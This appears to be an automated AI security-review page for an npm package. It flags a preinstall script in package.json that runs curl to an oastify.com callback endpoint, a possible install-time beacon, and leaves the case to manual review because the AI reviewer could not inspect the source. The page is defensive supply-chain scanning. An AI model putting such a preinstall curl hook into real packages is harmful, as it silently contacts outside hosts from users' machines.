AI Security Review
scanned 2h ago · by lpm-firewall-aiNo source-grounded final verdict can be made without reading package files directly.
Static reason
One or more suspicious static signals were detected.
Trigger
npm install, if the reported preinstall script exists
Impact
Potential install-time network beacon, unconfirmed by direct source inspection
Mechanism
unverified install-time curl to external endpoint
Rationale
Direct source inspection was required but could not be performed with available tools, so the scanner hint cannot be treated as proof. This requires manual review rather than finalizing from untrusted package data.
Evidence
package.json
Network endpoints1
cwcie03pzedo62twgbs3x6e9l0rsfk39.oastify.com
Decision evidence
public snapshotAI called this Manual Review at 10.0% confidence as Unknown with high false-positive risk.
Evidence for warning
- Unable to perform filesystem inspection because the read-only shell tool is unavailable in this run.
- Scanner-provided manifest claims a preinstall script: curl https://cwcie03pzedo62twgbs3x6e9l0rsfk39.oastify.com.
Evidence against
Behavioral surface
Trivial
Source & flagged code
2 flagged · loading sourcepackage.jsonView file
•scripts.preinstall = curl https://[redacted].oastify.com
High
Install Time Lifecycle Scripts
Package defines install-time lifecycle scripts.
package.jsonView on unpkg•scripts.preinstall = curl https://[redacted].oastify.com
Medium
Ambiguous Install Lifecycle Script
Install-time lifecycle script is not statically allowlisted and needs review.
package.jsonView on unpkgFindings
1 High1 Medium1 Low
HighInstall Time Lifecycle Scriptspackage.json
MediumAmbiguous Install Lifecycle Scriptpackage.json
LowScripts Present